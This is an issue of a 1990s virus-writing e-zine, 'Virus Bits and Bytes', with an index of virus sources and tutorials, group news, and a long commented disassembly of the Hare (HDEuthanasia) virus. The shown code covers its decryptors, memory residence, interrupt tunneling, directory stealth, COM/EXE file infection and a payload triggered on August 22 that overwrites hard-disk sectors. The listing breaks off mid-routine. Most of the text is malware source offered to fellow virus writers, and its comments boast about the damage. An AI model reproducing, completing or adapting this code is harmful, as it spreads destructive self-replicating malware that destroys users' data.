Virus Bits and Bytes Issue 4
Yes, I know it has been a long time, but here it is: The new issue of the VBB MAG.
The official homepage has changed to http://www.ilf.net/vbb/
INDEX
- 000-Index
- 001-News
- 002-Hare Update
- 003&004-2 more Rickdogg Virii! Enjoy!
- 005-The Destruction Kit
- 006-WMV.ARCHIE - A Demolition Kit Translation
- 007-The Coconut Virus Resurected!
- 008-Computers, Viruses & The Long Arm Of The Law - Rickdoggs Story
- 009-Virus Related Newsgroups! A rundown by God@rky!
- 010-Hidden F-Prot Parameters
- 011-Excel Macro Virus Yohimbe
- 012-VBB HOMEMADE! The Excel Legend Macro Virus by Pyro
- 013-A list of all known Macro Virii!
- 014-Nice Stealth Macro Virus!
- 015-The Outlaw Macro Virus!
- 016-Hacking Article
- 017-POLYMORPHISM IN MACRO VIRII
- 018-RETRO MACRO VIRII
- 019-HOW TO OPTIMIZE YOUR MACRO VIRII
BEGINNERS CORNER
- 020-COM Infections
- 021-Directory Traversal
CLOSING WORDS
- 022-VBB IS EXPANDING!
MEMBERS
- Dark Night
- Aurodreph
- God@rky
- Phardera
- Rickdogg
- Neophyte
- Pyro
- Spider
- Liquid Cool
If I forgot anyone, then please correct me......
NEWS
Yes, it has been a very long time since the last issue of our E'Zine, but I guess everybody (especially me) was really busy with other things in life such as work. Because of this huge "hole", there were even some rumors of VBB having stopped. As you can see this is not true.
While I was absent from all the virus discussions you were well entertained though by God@rky, who started to publish his excellent God@rky's Virus Heaven Newsletter. Keep up the good work!
The only sad thing that occurred to me recently was the fact the VLAD issue #7 was supposed to be the last of those excellent VLAD E'Zines. Well, I guess there will be others to replace it.
For the rest I care about, everything is going fine, except that Rickdoggs page was discovered on Pipeline USA, and he was kicked off the service(Yes, you understood it right!). He is now back on ILF with all of us at http://www.ilf.net/rickdogg/.
Dark Night
Hare (alias HDEuthanasia) disassembly
Published by Phardera [VBB]
e-mail: phardera@hotmail.com
Hello all....
This virus was published in VBB #3.
..and now I am present to you a list of this virus (I hope!).
; - HARE.LST -------->>>> CUT HERE <<<<-------------------------------------
comment~
=======================================================
== List of Hare {3} ==
== Disassembly and Analysis by Phardera [VBB] ==
== Published by Virus Bits & Bytes ==
== Tools: - Borland's Turbo Debugger ==
== - Sourcer ==
== ==
== Greetings to: ==
== - Demon Emperor (where are you?) ==
== - Dianita DSR. (in Jakarta, Indonesia) ==
== - All VBB Members (in the world) ==
== ==
== ==
== BTW: My comments start by ;---- and ;// ==
== ==
=======================================================
~
.err Re-assembly not recommended
; The following equates show data references outside the range of the program.
002C data_1e equ 2Ch ; (0000:002C=6Fh)
004C data_2e equ 4Ch ; (0000:004C=774h)
004E data_3e equ 4Eh ; (0000:004E=70h)
006C data_4e equ 6Ch ; (0000:006C=6EEh)
006E data_5e equ 6Eh ; (0000:006E=70h)
0070 data_6e equ 70h ; (0000:0070=0FF53h)
0072 data_7e equ 72h ; (0000:0072=0F000h)
0078 data_8e equ 78h ; (0000:0078=522h)
0084 data_9e equ 84h ; (0000:0084=109Eh)
0086 data_10e equ 86h ; (0000:0086=116h)
008A data_11e equ 8Ah ; (0000:008A=1336h)
0090 data_12e equ 90h ; (0000:0090=155h)
0092 data_13e equ 92h ; (0000:0092=1336h)
00A0 data_14e equ 0A0h ; (0000:00A0=10DAh)
00A2 data_15e equ 0A2h ; (0000:00A2=116h)
0100 data_16e equ 100h ; (0000:0100=59h)
018C data_17e equ 18Ch ; (0000:018C=0)
0413 data_18e equ 413h ; (0000:0413=280h)
041A data_19e equ 41Ah ; (0000:041A=30h)
041C data_20e equ 41Ch ; (0000:041C=30h)
043F data_21e equ 43Fh ; (0000:043F=0)
048E data_22e equ 48Eh ; (0000:048E=0)
7C00 data_23e equ 7C00h ; (0000:7C00=2)
7DBE data_24e equ 7DBEh ; (0000:7DBE=32h)
0000 data_25e equ 0 ; (1336:0000=20CDh)
0008 data_26e equ 8 ; (2ABF:0008=46h)
0000 data_27e equ 0 ; (72E0:0000=0FFh)
0003 data_28e equ 3 ; (72E0:0003=0FFFFh)
1E77 data_163e equ 1E77h ; (9804:1E77=0)
1E78 data_164e equ 1E78h ; (9804:1E78=0)
1E7A data_165e equ 1E7Ah ; (9804:1E7A=0)
1E7E data_166e equ 1E7Eh ; (9804:1E7E=0)
1E80 data_168e equ 1E80h ; (9804:1E80=0)
1E82 data_169e equ 1E82h ; (9804:1E82=0)
1F6A data_170e equ 1F6Ah ; (9804:1F6A=0)
1F6C data_171e equ 1F6Ch ; (9804:1F6C=0)
2000 data_172e equ 2000h ; (9804:2000=0)
2028 data_173e equ 2028h ; (9804:2028=0)
206A data_174e equ 206Ah ; (9804:206A=0)
20BA data_175e equ 20BAh ; (9804:20BA=0)
7C00 data_176e equ 7C00h ; (9804:7C00=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 0
hare proc far
0000 start:
0000 mov si,9
0003 cld ; Clear direction
0004 sti ; Enable interrupts
0005 mov cx,0F2Ch
0008 , mov di,14h ; (9804:0014=0B8h)
000B add di,si
;--------------------- Decryptor 1/2 (after polymorphic decryptor)
000D locloop_3: ; xref 9804:0012
000D not word ptr cs:[di]
0010 inc di
0011 inc di
0012 loop locloop_3 ; Loop if cx > 0
0014 mov ax,0FE23h ;// ID = 0FE23h
0017 int 21h ;// Check virus in memory
0019 cmp ax,0Dh ;// Virus already in memory?
001C push si
001D push ds
001E jnz loc_4 ;// NO! Lets fuck!
0020 jmp loc_11 ;// Restore header file (010F)
0023 loc_4: ; xref 9804:001E
0023 mov al,0A9h
0025 or al,al ; Zero ?
0027 jz loc_6 ; Jump if zero
0029 mov ah,al
002B add ah,1
002E mov cx,0E65h
0031 , mov di,1A2h ; (9804:01A2=50h)
0034 add di,si
;--------------------- Decryptor 2/2 ------------------------------
0036 locloop_5: ; xref 9804:0040
0036 xor cs:[di],ax
0039 inc di
003A inc di
003B add al,2
003D add ah,2
0040 loop locloop_5 ; Loop if cx > 0
;-------------------- Fuck memory size --------------------
0042 loc_6: ; xref 9804:0027
0042 int 12h ; Put (memory size)/1K in ax
0044 mov cl,6
0046 shl ax,cl ; Shift w/zeros fill
0048 dec ax
0049 mov es,ax
004B cmp word ptr es:data_26e,4353h ; (2ABF:0008=46h)
0052 je loc_8 ; Jump if equal
0054 loc_7: ; xref 9804:0078
0054 mov ah,52h
0056 int 21h ; DOS Services ah=function 52h
; get DOS data table ptr es:bx
;-------------------- Fuck MCB ---------------------------------------
0058 mov ax,es:[bx-2]
005C loc_8: ; xref 9804:0052, 006F
005C , mov es,ax
005E cmp byte ptr es:data_27e,5Ah ; (72E0:0000=0FFh) 'Z'
0064 je loc_9 ; Jump if equal
0066 mov ax,es:data_28e ; (72E0:0003=0FFFFh)
006A inc ax
006B mov bx,es
006D add ax,bx
006F jmp short loc_8 ; (005C)
0071 loc_9: ; xref 9804:0064
0071 mov ax,es:data_28e ; (72E0:0003=0FFFFh)
0075 sub ax,22Dh
0078 jc loc_7 ; Jump if carry Set
007A mov es:data_28e,ax ; (72E0:0003=0FFFFh)
007E inc ax
007F mov bx,es
0081 add ax,bx
0083 mov es,ax
0085 pop ds
0086 pop si
0087 push si
0088 push ds
0089 push cs
008A pop ds
;--------------- Copy virus to memory ---------------------------------
008B mov cx,1E6Ah ;// Size
008E xor di,di ; Zero register
0090 cld ; Clear direction
0091 rep movsb ; Rep when cx >0 Mov [si] to es:[di]
0093 push es
0094 mov ax,99h
0097 push ax
0098 retf ;// GOTO CS:0099h
0099 mov cs:data_59,cl ; (9804:018C=4)
009E mov ax,160Ah
00A1 int 2Fh ; ??int non-standard interrupt
00A3 or ax,ax ; Zero ?
00A5 jnz loc_10 ; Jump if not zero
00A7 cmp cx,3
00AA jb loc_10 ; Jump if below
00AC or byte ptr cs:data_59,80h ; (9804:018C=4)
00B2 loc_10: ; xref 9804:00A5, 00AA
00B2 call sub_20 ; (08D0)
00B5 call sub_48 ; (1379)
00B8 push cs
00B9 pop ds
00BA mov ah,52h
00BC int 21h ; DOS Services ah=function 52h
; get DOS data table ptr es:bx
;----------- Fuck Interrupt for Virus ---------------------
00BE mov ax,es:[bx-2]
00C2 mov data_53,ax ; (9804:0182=206h)
00C5 mov byte ptr data_62,19h ; (9804:0191=0)
00CA mov byte ptr data_55,0 ; (9804:0185=0)
00CF mov byte ptr data_54,1 ; (9804:0184=0)
00D4 mov ax,3521h
00D7 int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
00D9 mov data_39,bx ; (9804:0164=4A0h)
00DD mov word ptr data_39+2,es ; (9804:0166=315h)
00E1 mov data_51,bx ; (9804:017E=61F7h)
00E5 mov word ptr data_51+2,es ; (9804:0180=2099h)
00E9 call sub_2 ;// Tunneling int 21h (01F6)
00EC cld ; Clear direction
00ED , mov si,offset data_51 ; (9804:017E=0F7h)
00F0 , mov di,160h ; (9804:0160=0B2h)
00F3 movsw ; Mov [si] to es:[di]
00F4 movsw ; Mov [si] to es:[di]
00F5 xor ax,ax ; Zero register
00F7 mov ds,ax
00F9 mov word ptr ds:data_9e,388h ; (0000:0084=109Eh)
00FF mov ds:data_10e,cs ; (0000:0086=116h)
0103 call sub_57 ;// Trap int 13h (1827)
0106 call sub_16 ;// Pay load! (0778)
0109 pop es
010A pop si
010B xor si,si ; Zero register
010D push si
010E push es
;------------------- Restore header file --------------------------
010F loc_11: ; xref 9804:0020
010F pop es
0110 pop si
0111 push es
0112 pop ds
0113 push ds
0114 cmp byte ptr cs:data_48[si],1 ;// EXE? (9804:0179=1)
011A je $+15h ;// Yup! goto CS:012FH
;----------- COM --------------------------------
011C , add si,offset data_42 ; (9804:016B=10h)
0120 , mov di,data_16e ; (0000:0100=59h)
0123 push di
0124 cld ; Clear direction
0125 push cs
0126 pop ds
0127 movsw ; Mov [si] to es:[di]
0128 movsb ; Mov [si] to es:[di]
0129 push es
012A pop ds
012B call sub_1 ;// Registers to zero (0192)
012E retf ; Return far
;----------- EXE --------------------------------
012F mov ax,cs:data_43[si] ; (9804:016D=47h)
0134 pop bx
0135 add bx,10h
0138 add ax,bx
013A mov word ptr cs:[15Eh][si],ax ; (9804:015E=0BF2h)
013F mov ax,cs:data_42[si] ; (9804:016B=10h)
0144 mov word ptr cs:[15Ch][si],ax ; (9804:015C=0BBh)
0149 add word ptr cs:[171h][si],bx ; (9804:0171=411h)
014E call sub_1 ;// Registers to zero (0192)
0151 mov ss,word ptr cs:[171h][si] ; (9804:0171=411h)
0156 mov sp,word ptr cs:[16Fh][si] ; (9804:016F=1400h)
015B jmp far ptr $-0A0h
;----------------- CS:015Eh...... the real header
0160 mov dl,0Fh
0162 db 0C9h, 00h
0164 data_39 dw 4A0h, 315h ; xref 9804:00D9, 0306, 03D6, 17B3
0168 data_41 db 90h ; xref 9804:063F
0169 db 90h, 90h
016B data_42 dw 10h ; Data table (indexed access)
; xref 9804:011C, 013F, 04F6
016D data_43 dw 47h ; Data table (indexed access)
; xref 9804:012F
016F dw 1400h ; Data table (indexed access)
0171 data_44 db 11h ; Data table (indexed access)
; xref 9804:0149, 0151, 0501
0172 db 4
0173 data_45 dw 9 ; xref 9804:051E
0175 data_46 dw 24h ; xref 9804:0524
0177 data_47 dw 61F7h ; xref 9804:0518
0179 data_48 db 1 ; Data table (indexed access)
; xref 9804:0114, 050B, 05F1, 0AE1
; 0D23, 0F3B, 134D
017A data_49 dw 1E73h, 400h ; xref 9804:01FB, 0223, 0544, 0552
; 0599, 05C2, 05CB
017E data_51 dw 61F7h, 2099h ; xref 9804:00E1, 00ED, 01DE, 0218
; 0459, 04A5, 04AC, 0515
; 066F, 067D, 1049, 1183
; 1259, 12A3, 12AA, 1962
; 196E
0182 data_53 dw 206h ; xref 9804:00C2, 01C2, 194D
0184 data_54 db 0 ; xref 9804:00CF, 01C9, 01D1, 1958
0185 data_55 db 0 ; xref 9804:00CA, 01E6, 01EF, 0249
; 1953
0186 ,data_56 dw 0 ; segment storage
; xref 9804:01AE, 01B3, 0691, 06A2
0188 data_57 dd 00000h ; xref 9804:16FE, 177F, 17A2
018C data_59 db 4 ; xref 9804:0099, 00AC, 030F, 03DB
; 047E, 06EF, 0A87, 0C68
; 0C8F, 0D2F, 0D35, 0DAD
; 0E29, 124E, 1346, 13F5
; 1543, 1567, 1570, 1835
; 1869, 1876, 1CBD, 1E23
018D data_60 dw 0A17h ; xref 9804:02D4, 02EF
018F data_61 dw 114Bh ; xref 9804:02E7, 02FE
0191 data_62 db 0 ; xref 9804:00C5, 0213, 02DB, 02F4
; 1948
hare endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:012B, 014E
;==========================================================================
;------------- Clear registers -------------------------------
0192 sub_1 proc near
0192 xor ax,ax ; Zero register
0194 , push ax
0195 popf ; Pop flags
0196 sti ; Enable interrupts
0197 mov cx,ax
0199 mov di,ax
019B mov bp,ax
019D mov dx,ax
019F mov bx,ax
01A1 retn
sub_1 endp
;==========================================================================
;
; External Entry Point
;
;==========================================================================
;--------------- Tracing Interrupt -----------------------------
01A2 int_01h_entry proc far ; xref 9804:0203
01A2 push ax
01A3 push bx
01A4 push bp
01A5 push ds
01A6 mov bp,sp
01A8 mov ax,[bp+0Ah]
01AB mov bx,[bp+8]
01AE mov cs:data_56,cs ; (9804:0186=9804h)
01B3 cmp ax,cs:data_56 ; (9804:0186=9804h)
01B8 je loc_13 ; Jump if equal
01BA call sub_3 ; (0231)
01BD cmp ax,0F000h
01C0 jae loc_12 ; Jump if above or =
01C2 cmp ax,cs:data_53 ; (9804:0182=206h)
01C7 ja loc_13 ; Jump if above
01C9 loc_12: ; xref 9804:01C0
01C9 and cs:data_54,1 ; (9804:0184=0)
01CF jz loc_13 ; Jump if zero
01D1 mov cs:data_54,0 ; (9804:0184=0)
01D7 mov word ptr cs:data_51+2,ax ; (9804:0180=2099h)
01DB mov ax,[bp+8]
01DE mov cs:data_51,ax ; (9804:017E=61F7h)
01E2 loc_13: ; xref 9804:01B8, 01C7, 01CF
01E2 pop ds
01E3 pop bp
01E4 pop bx
01E5 pop ax
01E6 cmp cs:data_55,1 ; (9804:0185=0)
01EC je loc_14 ; Jump if equal
01EE iret ; Interrupt return
int_01h_entry endp
01EF loc_14: ; xref 9804:01EC
01EF mov cs:data_55,0 ; (9804:0185=0)
01F5 retf ; Return far
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:00E9, 196A
;==========================================================================
;----------------- Tunneling Interrupt -------------------------------
01F6 sub_2 proc near
01F6 mov ax,3501h ;// Int 1 (Single step)
01F9 int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
01FB mov data_49,bx ; (9804:017A=1E73h)
01FF mov word ptr data_49+2,es ; (9804:017C=400h)
0203 , mov dx,offset int_01h_entry ;// If TF On!
0206 mov ah,25h
0208 int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
020A xor dl,dl ; Zero register
020C pushf ; Push flags
020D pop ax
020E or ax,100h ;// Set TF On
0211 push ax
0212 popf ;// Call Int 1
0213 mov ah,data_62 ; (9804:0191=0)
0217 pushf ; Push flags
0218 call dword ptr data_51 ; (9804:017E=61F7h)
021C pushf ; Push flags
021D pop ax
021E and ax,0FEFFh
0221 push ax
0222 popf ; Pop flags
0223 lds dx,dword ptr data_49 ; (9804:017A=1E73h) Load seg:offset pt
0227 mov ax,2501h
022A int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
022C push cs
022D push cs
022E pop es
022F pop ds
0230 retn
sub_2 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:01BA
;==========================================================================
0231 sub_3 proc near
0231 push ax
0232 mov ds,ax
0234 mov al,[bx]
0236 cmp al,9Dh
0238 jne loc_15 ; Jump if not equal
023A or word ptr [bp+0Ch],100h
023F jmp short loc_16 ; (024F)
0241 nop
0242 loc_15: ; xref 9804:0238
0242 cmp al,9Ch
0244 jne loc_16 ; Jump if not equal
0246 inc word ptr [bp+8]
0249 mov cs:data_55,1 ; (9804:0185=0)
024F loc_16: ; xref 9804:023F, 0244
024F pop ax
0250 retn
sub_3 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:16F4
;==========================================================================
;----------------- Pay load & destroyer! --------------------------------
0251 sub_4 proc near
0251 mov ah,4
0253 int 1Ah ; Real time clock ah=func 04h
; get date cx=year, dx=mon/day
0255 test dh,8 ;// August
0258 jz loc_ret_17 ; Jump if zero
025A cmp dl,22h ;// 22
025D je loc_18 ; Jump if equal
025F loc_ret_17: ; xref 9804:0258
025F retn
0260 loc_18: ; xref 9804:025D
0260 mov ax,3
0263 int 10h ; Video display ah=functn 00h
; set display mode in al
0265 , mov si,offset data_156 ; (9804:1E2D='"HDEuthanasia-v3')
0268 mov bh,0
026A mov cx,3Dh
026D locloop_19: ; xref 9804:0272
026D lodsb ; String [si] to al
026E mov ah,0Eh
0270 int 10h ; Video display ah=functn 0Eh
; write char al, teletype mode
0272 loop locloop_19 ; Loop if cx > 0
;--------------- Oh no...fucking your HD -------------------
0274 mov dl,80h
0276 loc_20: ; xref 9804:02C3
0276 , mov bh,dl
0278 xor dl,1
027B mov ah,8
027D int 13h ; Disk dl=drive 1 ah=func 08h
; get drive parameters, bl=type
; cx=cylinders, dh=max heads
027F and cl,3Fh ; '?'
0282 mov al,cl
0284 mov ah,3 ;// AH=3 --> Write!
0286 push ax
0287 mov dl,bh
0289 mov ah,8
028B int 13h ; Disk dl=drive 0 ah=func 08h
; get drive parameters, bl=type
; cx=cylinders, dh=max heads
028D and cl,3Fh ; '?'
0290 mov al,cl
0292 mov ah,3 ;// AH=3 --> Write!
0294 mov dl,bh
0296 mov cx,101h
0299 push ax
029A mov bp,sp
029C loc_21: ; xref 9804:02B6, 02BB
029C push dx
029D loc_22: ; xref 9804:02B1
029D test dl,1
02A0 jnz loc_23 ; Jump if not zero
02A2 mov ax,[bp] ;// AH=3 --> Write!
02A5 jmp short loc_24 ; (02AA)
02A7 loc_23: ; xref 9804:02A0
02A7 mov ax,[bp+2] ;// AH=3 --> Write!
02AA loc_24: ; xref 9804:02A5
02AA int 13h ; ??int non-standard interrupt
02AC xor dl,1
02AF dec dh
02B1 jnz loc_22 ; Jump if not zero
02B3 pop dx
02B4 inc ch
02B6 jnz loc_21 ; Jump if not zero
02B8 add cl,40h ; '@'
02BB jnc loc_21 ; Jump if carry=0
02BD add dl,2
02C0 add sp,4
02C3 jmp short loc_20 ; (0276)
sub_4 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:02D0, 02E4, 02FB, 031D, 03EA, 040F, 0452
; 046C, 04B4, 054F, 0572, 05DF, 05ED, 060C
; 0622, 065A, 0665, 066C, 0687, 068E, 069B
; 06A7, 07CE, 0A40, 0E67, 1016, 1041, 1069
; 10A2, 10B8, 113A, 1145, 11AC, 11B7, 11BF
; 11C6, 126F, 1280, 12B4
;==========================================================================
02C5 sub_5 proc near
02C5 pushf ; Push flags
02C6 call dword ptr cs:[160h] ; (9804:0160=0FB2h)
02CB retn
sub_5 endp
02CC loc_25: ; xref 9804:0393
02CC , push bx
02CD push ax
02CE mov ah,62h ; 'b'
02D0 call sub_5 ; (02C5)
02D3 pop ax
02D4 cmp cs:data_60,bx ; (9804:018D=0A17h)
02D9 jne loc_26 ; Jump if not equal
02DB cmp cs:data_62,dl ; (9804:0191=0)
02E0 jne loc_26 ; Jump if not equal
02E2 pop bx
02E3 popf ; Pop flags
02E4 call sub_5 ; (02C5)
02E7 mov bx,cs:data_61 ; (9804:018F=114Bh)
02EC retf 2 ; Return far
02EF loc_26: ; xref 9804:02D9, 02E0
02EF mov cs:data_60,bx ; (9804:018D=0A17h)
02F4 mov cs:data_62,dl ; (9804:0191=0)
02F9 pop bx
02FA popf ; Pop flags
02FB call sub_5 ; (02C5)
02FE mov cs:data_61,bx ; (9804:018F=114Bh)
0303 retf 2 ; Return far
;--------------- Dir Stealth ----------------------------------
0306 loc_27: ; xref 9804:037E
0306 call dword ptr cs:data_39 ; (9804:0164=4A0h)
030B pushf ; Push flags
030C push ax
030D push bx
030E push es
030F test cs:data_59,2 ; (9804:018C=4)
0315 jnz loc_31 ; Jump if not zero
0317 or al,al ; Zero ?
0319 jnz loc_31 ; Jump if not zero
031B mov ah,2Fh ; '/'
031D call sub_5 ; (02C5)
0320 cmp byte ptr cs:[380h],40h ; (9804:0380=4Eh) '@'
0326 ja loc_29 ; Jump if above
0328 or word ptr es:[bx+26h],0
032D jnz loc_28 ; Jump if not zero
032F cmp word ptr es:[bx+24h],1E9Ch
0335 jb loc_31 ; Jump if below
0337 loc_28: ; xref 9804:032D
0337 mov ax,es:[bx+1Eh]
033B and al,1Fh
033D cmp al,11h
033F jne loc_31 ; Jump if not equal
0341 sub word ptr es:[bx+24h],1EB0h
0347 sbb word ptr es:[bx+26h],0
034C jmp short loc_31 ; (0372)
034E loc_29: ; xref 9804:0326
034E or word ptr es:[bx+1Ch],0
0353 jnz loc_30 ; Jump if not zero
0355 cmp word ptr es:[bx+1Ah],1E9Ch
035B jb loc_31 ; Jump if below
035D loc_30: ; xref 9804:0353
035D mov ax,es:[bx+16h]
0361 and al,1Fh
0363 cmp al,11h
0365 jne loc_31 ; Jump if not equal
0367 sub word ptr es:[bx+1Ah],1EB0h
036D sbb word ptr es:[bx+1Ch],0
0372 loc_31: ; xref 9804:0315, 0319, 0335, 033F
; 034C, 035B, 0365
0372 pop es
0373 pop bx
0374 pop ax
0375 popf ; Pop flags
0376 retf 2 ; Return far
0379 loc_32: ; xref 9804:03B0, 03B5, 03BA, 03BF
0379 mov byte ptr cs:[380h],ah ; (9804:0380=4Eh)
037E jmp short loc_27 ; (0306)
0380 dec si
0381 loc_33: ; xref 9804:038C
0381 mov ax,0Dh
0384 popf ; Pop flags
0385 retf 2 ; Return far
0388 pushf ; Push flags
;---------------- Trap Int 21h -------------------------------------------
0389 cmp ax,0FE23h
038C je loc_33 ; Jump if equal
038E cmp ah,36h ; '6'
0391 jne loc_34 ; Jump if not equal
0393 jmp loc_25 ; (02CC)
0396 loc_34: ; xref 9804:0391
0396 cmp ah,4Ch ; 'L'
0399 je loc_38 ; Jump if equal
039B cmp ah,31h ; '1'
039E je loc_38 ; Jump if equal
03A0 cmp ah,0
03A3 je loc_38 ; Jump if equal
03A5 cmp ax,4B00h
03A8 jne loc_35 ; Jump if not equal
03AA call sub_6 ; (0426)
03AD loc_35: ; xref 9804:03A8
03AD cmp ah,11h
03B0 je loc_32 ; Jump if equal
03B2 cmp ah,12h
03B5 je loc_32 ; Jump if equal
03B7 cmp ah,4Eh ; 'N'
03BA je loc_32 ; Jump if equal
03BC cmp ah,4Fh ; 'O'
03BF je loc_32 ; Jump if equal
03C1 cmp ah,3Dh ; '='
03C4 jne loc_36 ; Jump if not equal
03C6 call sub_40 ; (1005)
03C9 loc_36: ; xref 9804:03C4
03C9 cmp ah,3Eh ; '>'
03CC jne loc_37 ; Jump if not equal
03CE popf ; Pop flags
03CF call sub_45 ; (1242)
03D2 retf 2 ; Return far
03D5 loc_37: ; xref 9804:03CC
03D5 popf ; Pop flags
03D6 jmp dword ptr cs:data_39 ; (9804:0164=4A0h)
03DB loc_38: ; xref 9804:0399, 039E, 03A3
03DB and cs:data_59,4 ; (9804:018C=4)
03E1 push ax
03E2 push bx
03E3 push cx
03E4 push dx
03E5 push di
03E6 push es
03E7 push ds
03E8 mov ah,62h ; 'b'
03EA call sub_5 ; (02C5)
03ED jc loc_40 ; Jump if carry Set
03EF cld ; Clear direction
03F0 mov es,bx
03F2 mov es,es:data_1e ; (0000:002C=6Fh)
03F7 xor di,di ; Zero register
03F9 mov al,0
03FB loc_39: ; xref 9804:0403
03FB mov cx,0FFFFh
03FE repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
0400 cmp es:[di],al
0403 jne loc_39 ; Jump if not equal
0405 add di,3
0408 mov dx,di
040A push es
040B pop ds
040C mov ax,3D00h
040F call sub_5 ; (02C5)
0412 jc loc_40 ; Jump if carry Set
0414 mov bx,ax
0416 call sub_45 ; (1242)
0419 loc_40: ; xref 9804:03ED, 0412
0419 pop ds
041A pop es
041B pop di
041C pop dx
041D pop cx
041E pop bx
041F pop ax
0420 popf ; Pop flags
0421 jmp dword ptr cs:[160h] ; (9804:0160=0FB2h)
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:03AA
;==========================================================================
0426 sub_6 proc near
0426 push ax
0427 push bx
0428 push cx
0429 push dx
042A push es
042B push ds
042C push di
042D push si
042E call sub_7 ; (04C6)
0431 call sub_42 ; (11CA)
0434 call sub_12 ; (068B)
0437 call sub_15 ; (06FE)
043A pushf ; Push flags
043B push ds
043C push cs
043D pop ds
043E , mov di,offset data_66 ; (9804:073B='LP.EXE9E.EXE')
0441 , mov si,offset data_67 ; (9804:0748='LP.EXED.COME')
0444 add bx,4
0447 mov cx,bx
0449 rep movsb ; Rep when cx >0 Mov [si] to es:[di]
044B pop ds
044C popf ; Pop flags
044D jc loc_46 ; Jump if carry Set
044F mov ax,3D02h
0452 call sub_5 ; (02C5)
0455 xchg bx,ax
0456 call sub_10 ; (0669)
0459 mov ax,cs:data_51 ; (9804:017E=61F7h)
045D and al,1Fh
045F push ax
0460 mov ah,3Fh ; '?'
0462 mov cx,1Ch
0465 push cs
0466 pop ds
0467 push ds
0468 pop es
0469 mov dx,1E6Ah
046C call sub_5 ; (02C5)
046F mov si,dx
0471 cld ; Clear direction
0472 lodsw ; String [si] to ax
0473 cmp ax,5A4Dh
0476 je loc_41 ; Jump if equal
0478 cmp ax,4D5Ah
047B jne loc_43 ; Jump if not equal
047D loc_41: ; xref 9804:0476
047D pop ax
047E test data_59,4 ; (9804:018C=4)
0483 jz loc_42 ; Jump if zero
0485 cmp al,11h
0487 je loc_45 ; Jump if equal
0489 call sub_8 ; (04EB)
048C jnc loc_44 ; Jump if carry=0
048E jmp short loc_46 ; (04B2)
0490 loc_42: ; xref 9804:0483
0490 cmp al,11h
0492 jne loc_45 ; Jump if not equal
0494 call sub_41 ; (107B)
0497 jnc loc_45 ; Jump if carry=0
0499 jmp short loc_46 ; (04B2)
049B loc_43: ; xref 9804:047B
049B pop ax
049C cmp al,11h
049E je loc_46 ; Jump if equal
04A0 call sub_9 ; (05F1)
04A3 jc loc_45 ; Jump if carry Set
04A5 loc_44: ; xref 9804:048C
04A5 mov ax,data_51 ; (9804:017E=61F7h)
04A8 and al,0E0h
04AA or al,11h
04AC mov data_51,ax ; (9804:017E=61F7h)
04AF loc_45: ; xref 9804:0487, 0492, 0497, 04A3
04AF call sub_11 ; (067A)
04B2 loc_46: ; xref 9804:044D, 048E, 0499, 049E
04B2 mov ah,3Eh ; '>'
04B4 call sub_5 ; (02C5)
04B7 call sub_13 ; (069F)
04BA call sub_43 ; (1209)
04BD pop si
04BE pop di
04BF pop ds
04C0 pop es
04C1 pop dx
04C2 pop cx
04C3 pop bx
04C4 pop ax
04C5 retn
sub_6 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:042E
;==========================================================================
04C6 sub_7 proc near
04C6 call sub_16 ; (0778)
04C9 mov ax,160Ah
04CC int 2Fh ; ??int non-standard interrupt
04CE or ax,ax ; Zero ?
04D0 jnz loc_ret_48 ; Jump if not zero
04D2 cmp bh,4
04D5 jb loc_ret_48 ; Jump if below
04D7 mov ax,5445h
04DA int 13h ; ??int non-standard interrupt
04DC cmp ax,4554h
04DF jne loc_ret_48 ; Jump if not equal
04E1 call sub_16 ; (0778)
04E4 jc loc_47 ; Jump if carry Set
04E6 retn
04E7 loc_47: ; xref 9804:04E4
04E7 call sub_71 ; (1AE8)
04EA loc_ret_48: ; xref 9804:04D0, 04D5, 04DF
04EA retn
sub_7 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0489, 129E
;==========================================================================
;---------------- Reloc EXE header -------------------------------
04EB sub_8 proc near
04EB cmp word ptr ds:data_169e,40h ; (9804:1E82=0)
04F0 jne loc_50 ; Jump if not equal
04F2 stc ; Set carry flag
04F3 loc_49: ; xref 9804:0513
04F3 jmp loc_ret_56 ; (05F0)
04F6 loc_50: ; xref 9804:04F0
04F6 , mov di,offset data_42 ; (9804:016B=10h)
04F9 , mov si,data_166e ; (9804:1E7E=0)
04FC movsw ; Mov [si] to es:[di]
04FD movsw ; Mov [si] to es:[di]
04FE , mov si,data_164e ; (9804:1E78=0)
0501 , mov di,offset data_44 ; (9804:0171=11h)
0504 movsw ; Mov [si] to es:[di]
0505 sub di,4
0508 movsw ; Mov [si] to es:[di]
0509 mov si,dx
050B mov data_48,1 ; (9804:0179=1)
0510 call sub_47 ; (1346)
0513 jc loc_49 ; Jump if carry Set
0515 mov ax,data_51 ; (9804:017E=61F7h)
0518 mov data_47,ax ; (9804:0177=61F7h)
051B mov ax,[si+2]
051E mov data_45,ax ; (9804:0173=9)
0521 mov ax,[si+4]
0524 mov data_46,ax ; (9804:0175=24h)
0527 mov ax,[si+4]
052A mov dx,200h
052D cmp word ptr [si+2],0
0531 je loc_51 ; Jump if equal
0533 dec ax
0534 loc_51: ; xref 9804:0531
0534 mul dx ; dx:ax = reg * ax
0536 mov word ptr data_49+2,dx ; (9804:017C=400h)
053A mov dx,[si+2]
053D add ax,dx
053F adc word ptr data_49+2,0 ; (9804:017C=400h)
0544 mov data_49,ax ; (9804:017A=1E73h)
0547 push ax
0548 xor cx,cx ; Zero register
054A mov dx,cx
054C mov ax,4202h
054F call sub_5 ; (02C5)
0552 sub ax,data_49 ; (9804:017A=1E73h)
0556 jz loc_52 ; Jump if zero
0558 pop ax
0559 stc ; Set carry flag
055A jmp loc_ret_56 ; (05F0)
055D loc_52: ; xref 9804:0556
055D sub dx,word ptr data_49+2 ; (9804:017C=400h)
0561 jz loc_53 ; Jump if zero
0563 pop ax
0564 stc ; Set carry flag
